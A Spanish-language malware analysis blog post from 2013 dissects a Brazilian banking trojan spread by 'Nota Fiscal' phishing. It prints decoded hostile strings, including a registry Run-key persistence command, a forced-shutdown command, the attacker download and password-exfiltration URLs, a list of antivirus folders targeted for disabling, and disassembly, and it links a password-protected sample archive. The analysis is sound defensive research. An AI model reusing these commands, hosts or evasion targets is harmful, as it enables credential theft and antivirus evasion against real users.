miércoles, 26 de junio de 2013

Malware Brasileño: Nota Fiscal em PDF


Hoy les traigo esta muestra de este curioso malware de origen Brasileño que utiliza un método de adición/ sustracción de caracteres especiales para ocultar strings.



E-mail Phishing (Gracias Raúl  )




Link en DropBox
 hxxps://dl.dropbox.com/s/3vazu0cn3kgngzg/NotaFiscal.zip

Analisis en V.T.





Cadenas codificadas(?)



'x%8*6*v*s#6#4#d%k%.%c*d*x*'
'x%8%6*v*s@6@4@d@k#1#.%c%d%x%'
'C*:*\\#p#r#o%g%r%a*m*s*y@s@t@e@m#65\\@'
'p#r#o%c%e*s*s*x#x#x#'
'.*v@r@x@'
'p%r%o*c*e*s#s#x#x%x%2%'
'm@o@d@c#d#x#'
'.%c%p*l*'
'm@o@d#c#d#y%'
'i*e*w*'
'.#d%l%l*'
'w%i%n*k*a*v@'
'g*a*n*s@h@'
'.*v#b#s#'
'm@o@d#c#d#b%'
'.*e#x#e#'
'm%o*d*c#d#a#'
'c*f*t#m#o%n%'
'C*:*\\@B@a@n#c#o#B%r%a%s%i*l*'
'c%m%d* */#c# #r#m%d%i*r* */*s@ @/@q@ # #C#:%\\%B%a%n*c*o*B*r#a#s#i#l%'
'\"#n%u%R%\\*n*o*i#s#r#e%V%t%n*e*r*r@u@C@\\#s#w#o#d#n%i%W%\\*t*f*o*s*o#r#c#i#M%\\%E%R%A*W*T*F*O@S@\\@R#E#S#U#_#T%N%E%R*R*U*C*_*Y#E#K#H%\"% %d%d%a* *g*e@r@'
'J%a%v%a*U*p*d#a#t#e%I%s%r*'
'w%i*n*k*a#v#.#c%p%l% *i*n*i@'
'J#a#v%a%U*p*d*a#t#e#I#s%b%s%'
'g*a*n#s#h#.%v%b%s*'
'C*:*\\#p#r#o%g%r%a*m*s*y@s@t@e@m#65\\@s*y*s*8@.@l@o#g#'
'h#t#t%p%:*/*/*x*1@x@2@x#3#.#t%k%/%m%o*d*/*'
'/%i%m*a*g*e#s#/#dir2/#?#c#h%a%v%e*=*x*c@h@a@v#e#&#u#r%l%=%'
'<%/%b%>%<*/*f*o#n#t#>%<%f%o%n*t*'
'c#o#l%o%r%=*o*r*a#n#g#e%>%<%b*>*'
'<@/@b#>#<#/%f%o%n*t*>*'
'c%m%d% */*c* @s@h@u#t#d#o%w%n% *-*f* *-#r# #-#t% %6%0%0* *-*m*'


Quitando los caracteres especiales #&*%

Queda.........

x86vs64dk.cdx
x86vs64dk1.cdx
C:\\programsystem65\\
processxxx
.vrx
processxxx2
modcdx
.cpl
modcdy
iew
.dll
winkav
gansh
.vbs
modcdb
.exe
modcda
cftmon
C:\\BancoBrasil
cmd /c rmdir /s /q  C:\\BancoBrasil
\"nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\ERAWTFOS\\RESU_TNERRUC_YEKH\" dda ger
JavaUpdateIsr
winkav.cpl ini
JavaUpdateIsbs
gansh.vbs
C:\\programsystem65\\sys8.log
http://x1x2x3.tk/mod/
/images/dir2/?chave=xchave&url=

color=orange>
cmd /c shutdown -f -r -t 600 -m
loptuwBCG_70KORVacgjnp59rvACH15



http://x1x2x3.tk/mod//images/dir2/?chave=xchave&url=



Distintos archivos son bajados por el malware.
Dos de ellos son herramientas para recuperación de contraseñas de Nirsoft (Mail Pass View y Web Browser Pass View), y dos ejecutables .cpl.
xmd.cpl encargado de comandar los productos de Nirsoft. 
winkav.cpl que se encarga de matar los antivirus.









Mail PassView
Recovers the passwords of the following email programs: Windows Live Mail, Windows Mail, Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, 
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.


WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 8.0), Mozilla Firefox (All Versions), Google Chrome, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser. After retrieving your lost passwords, you can save them into text/html/csv/xml file, by using the 'Save Selected Items' option (Ctrl+S).

Estos dos programas son utilizados como command-line (en forma silenciosa) para hacerse de las claves, luego son enviadas a un servidor en la nube (lord.luzcifez.mydad.info/vrx2//sm/atuando2.php)




WINKAV (anti-antiVirus)

Algunos strings decodificados:

MOV EAX,winkav.009144FC                   ASCII "C:\Arquivos de programas\Symantec\"
MOV EAX,winkav.0091454C                   ASCII "C:\Arquivos de programas\Symantec AntiVirus\"
MOV EAX,winkav.009145B0                   ASCII "C:\Arquivos de programas\VBA32\"
MOV EAX,winkav.009145F8                   ASCII "C:\Arquivos de programas\DrWeb\"
MOV EAX,winkav.00914640                   ASCII "C:\Arquivos de programas\Trend Micro\"
MOV EAX,winkav.00914694                   ASCII "C:\Arquivos de programas\a-squared Free\"
MOV EAX,winkav.009146F0                   ASCII "C:\Arquivos de programas\a-squared Anti-Malware\"
MOV EAX,winkav.0091475C                   ASCII "C:\Arquivos de programas\AVAST Software\"
MOV EAX,winkav.009147B8                   ASCII "C:\Arquivos de programas\GbPlugin\"
MOV EAX,winkav.00914808                   ASCII "C:\Arquivos de programas\AVG\"
MOV EAX,winkav.0091484C                   ASCII "C:\Arquivos de programas\Alwil Software\Avast4\"
MOV EAX,winkav.009148B4                   ASCII "C:\Arquivos de programas\Alwil Software\Avast5\"
MOV EAX,winkav.0091491C                   ASCII "C:\Arquivos de programas\Alwil Software\Avast6\"
MOV EAX,winkav.00914984                   ASCII "C:\Arquivos de programas\AVAST Software\Avast\"
MOV EAX,winkav.009149EC                   ASCII "C:\Arquivos de programas\AVG\AVG2012\"
MOV EAX,winkav.00914A40                   ASCII "C:\Arquivos de programas\AVG\AVG8\"
MOV EAX,winkav.00914A90                   ASCII "C:\Arquivos de programas\AVG\AVG10"
MOV EAX,winkav.00914AE0                   ASCII "C:\Arquivos de programas\AVG\AVG9\"
MOV EAX,winkav.00914B30                   ASCII "C:\Arquivos de programas\AVG Secure Search\"
MOV EAX,winkav.00914B90                   ASCII "C:\Arquivos de programas\Avira\AntiVir Desktop"
MOV EAX,winkav.00914BF8                   ASCII "C:\Arquivos de programas\Avira\AntiVir PersonalEdition Cl
MOV ECX,winkav.00914C80                   ASCII "Symantec\"
MOV ECX,winkav.00914C9C                   ASCII "Symantec AntiVirus\"
MOV ECX,winkav.00914CCC                   ASCII "VBA32\"
MOV ECX,winkav.00914CE4                   ASCII "DrWeb\"
MOV ECX,winkav.00914CFC                   ASCII "Trend Micro\"
MOV ECX,winkav.00914D20                   ASCII "a-squared Free\"
MOV ECX,winkav.00914D48                   ASCII "a-squared Anti-Malware\"
MOV ECX,winkav.00914D80                   ASCII "AVAST Software\"
MOV ECX,winkav.00914DA8                   ASCII "GbPlugin\"
MOV ECX,winkav.00914DC4                   ASCII "AVG\"
MOV ECX,winkav.00914DD8                   ASCII "Alwil Software\Avast4\"
MOV ECX,winkav.00914E10                   ASCII "Alwil Software\Avast5\"
MOV ECX,winkav.00914E48                   ASCII "Alwil Software\Avast6\"
MOV ECX,winkav.00914E80                   ASCII "AVAST Software\Avast\"
MOV ECX,winkav.00914EB4                   ASCII "AVG\AVG2012\"
MOV ECX,winkav.00914ED8                   ASCII "AVG\AVG8\"
MOV ECX,winkav.00914EF4                   ASCII "AVG\AVG10"
MOV ECX,winkav.00914F10                   ASCII "AVG\AVG9\"
MOV ECX,winkav.00914F2C                   ASCII "AVG Secure Search\"
MOV ECX,winkav.00914F5C                   ASCII "Avira\AntiVir Desktop"
MOV ECX,winkav.00914F90                   ASCII "Avira\AntiVir PersonalEdition Classic\"
MOV EAX,winkav.00914FE8                   ASCII "C:\Program Files\Symantec\"
MOV EAX,winkav.00915028                   ASCII "C:\Program Files\Symantec AntiVirus\"
MOV EAX,winkav.0091507C                   ASCII "C:\Program Files\VBA32\"
MOV EAX,winkav.009150B4                   ASCII "C:\Program Files\DrWeb\"
MOV EAX,winkav.009150EC                   ASCII "C:\Program Files\Trend Micro\"
MOV EAX,winkav.00915130                   ASCII "C:\Program Files\a-squared Free\"
MOV EAX,winkav.0091517C                   ASCII "C:\Program Files\a-squared Anti-Malware\"
MOV EAX,winkav.009151D8                   ASCII "C:\Program Files\AVAST Software\"
MOV EAX,winkav.00915224                   ASCII "C:\Program Files\GbPlugin\"
MOV EAX,winkav.00915264                   ASCII "C:\Program Files\AVG\"
MOV EAX,winkav.00915298                   ASCII "C:\Program Files\Alwil Software\Avast4\"
MOV EAX,winkav.009152F0                   ASCII "C:\Program Files\Alwil Software\Avast5\"
MOV EAX,winkav.00915348                   ASCII "C:\Program Files\Alwil Software\Avast6\"
MOV EAX,winkav.009153A0                   ASCII "C:\Program Files\AVAST Software\Avast\"
MOV EAX,winkav.009153F8                   ASCII "C:\Program Files\AVG\AVG2012\"
MOV EAX,winkav.0091543C                   ASCII "C:\Program Files\AVG\AVG8\"
MOV EAX,winkav.0091547C                   ASCII "C:\Program Files\AVG\AVG10"
MOV EAX,winkav.009154BC                   ASCII "C:\Program Files\AVG\AVG9\"
MOV EAX,winkav.009154FC                   ASCII "C:\Program Files\AVG Secure Search\"
MOV EAX,winkav.0091554C                   ASCII "C:\Program Files\Avira\AntiVir Desktop"

MOV EAX,winkav.009155A4                   ASCII "C:\Program Files\Avira\AntiVir PersonalEdition Classic\"


"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend" 



El downloader/troyano utilizan otro método para decodificar strings muy distinta y mas robusta a la substitución de caracteres, llamativamente no se utiliza para todos los strings.








RUTINA:

0046DE50  /$ 55             PUSH EBP
0046DE51  |. 8BEC           MOV EBP,ESP
0046DE53  |. 33C9           XOR ECX,ECX
0046DE55  |. 51             PUSH ECX
0046DE56  |. 51             PUSH ECX
0046DE57  |. 51             PUSH ECX
0046DE58  |. 51             PUSH ECX
0046DE59  |. 51             PUSH ECX
0046DE5A  |. 51             PUSH ECX
0046DE5B  |. 51             PUSH ECX
0046DE5C  |. 51             PUSH ECX
0046DE5D  |. 53             PUSH EBX
0046DE5E  |. 8BDA           MOV EBX,EDX
0046DE60  |. 8945 FC        MOV DWORD PTR SS:[EBP-4],EAX
0046DE63  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
0046DE66  |. E8 196BF9FF    CALL xmd.00404984
0046DE6B  |. 33C0           XOR EAX,EAX
0046DE6D  |. 55             PUSH EBP
0046DE6E  |. 68 EBDE4600    PUSH xmd.0046DEEB
0046DE73  |. 64:FF30        PUSH DWORD PTR FS:[EAX]
0046DE76  |. 64:8920        MOV DWORD PTR FS:[EAX],ESP
0046DE79  |. 8D55 E0        LEA EDX,DWORD PTR SS:[EBP-20]
0046DE7C  |. 8B45 FC        MOV EAX,DWORD PTR SS:[EBP-4]
0046DE7F  |. E8 60FEFFFF    CALL xmd.0046DCE4
0046DE84  |. 8B45 E0        MOV EAX,DWORD PTR SS:[EBP-20]
0046DE87  |. 8D55 E4        LEA EDX,DWORD PTR SS:[EBP-1C]
0046DE8A  |. E8 8DF0FFFF    CALL xmd.0046CF1C
0046DE8F  |. 8B45 E4        MOV EAX,DWORD PTR SS:[EBP-1C]
0046DE92  |. 8D55 E8        LEA EDX,DWORD PTR SS:[EBP-18]
0046DE95  |. E8 4AFEFFFF    CALL xmd.0046DCE4
0046DE9A  |. 8B45 E8        MOV EAX,DWORD PTR SS:[EBP-18]
0046DE9D  |. 8D55 EC        LEA EDX,DWORD PTR SS:[EBP-14]
0046DEA0  |. E8 DFEFFFFF    CALL xmd.0046CE84
0046DEA5  |. 8B45 EC        MOV EAX,DWORD PTR SS:[EBP-14]
0046DEA8  |. 8D55 F0        LEA EDX,DWORD PTR SS:[EBP-10]
0046DEAB  |. E8 34FEFFFF    CALL xmd.0046DCE4
0046DEB0  |. 8B45 F0        MOV EAX,DWORD PTR SS:[EBP-10]
0046DEB3  |. 8D55 F4        LEA EDX,DWORD PTR SS:[EBP-C]
0046DEB6  |. E8 61F0FFFF    CALL xmd.0046CF1C
0046DEBB  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
0046DEBE  |. 8D55 F8        LEA EDX,DWORD PTR SS:[EBP-8]
0046DEC1  |. E8 1EFEFFFF    CALL xmd.0046DCE4
0046DEC6  |. 8B45 F8        MOV EAX,DWORD PTR SS:[EBP-8]
0046DEC9  |. 8BD3           MOV EDX,EBX
0046DECB  |. E8 B4EFFFFF    CALL xmd.0046CE84
0046DED0  |. 33C0           XOR EAX,EAX
0046DED2  |. 5A             POP EDX
0046DED3  |. 59             POP ECX
0046DED4  |. 59             POP ECX
0046DED5  |. 64:8910        MOV DWORD PTR FS:[EAX],EDX
0046DED8  |. 68 F2DE4600    PUSH xmd.0046DEF2
0046DEDD  |> 8D45 E0        LEA EAX,DWORD PTR SS:[EBP-20]
0046DEE0  |. BA 08000000    MOV EDX,8
0046DEE5  |. E8 0E66F9FF    CALL xmd.004044F8
0046DEEA  \. C3             RETN


Aquí las muestras sobre este caso: 

https://www.dropbox.com/s/l96154vpwzmllyo/TrojanBambra.gen.14-06-13.rar

Passw = infected 

sea cuidadoso :D

Es todo por el momento....





@Dkavalanche 2013





2 comentarios:

- Raúl - dijo...

Interesante el tema de las descargas de herramientas que hace el malware para "recuperar" las contraseñas.

@Dkavalanche dijo...

Hola Raul!


Si es interesante, en vez de tratar de programar esta utilidad en el cuerpo del troyano se vale de estas herramientas legitimas de NirSoft.
Por cierto las herramientas de NirSoft son muy buenas.

Android: BankBot. Hace un tiempo se filtro el fuente de un Bankbo t para android y se masifico bastante, creo que muchos lo han lanzado pa...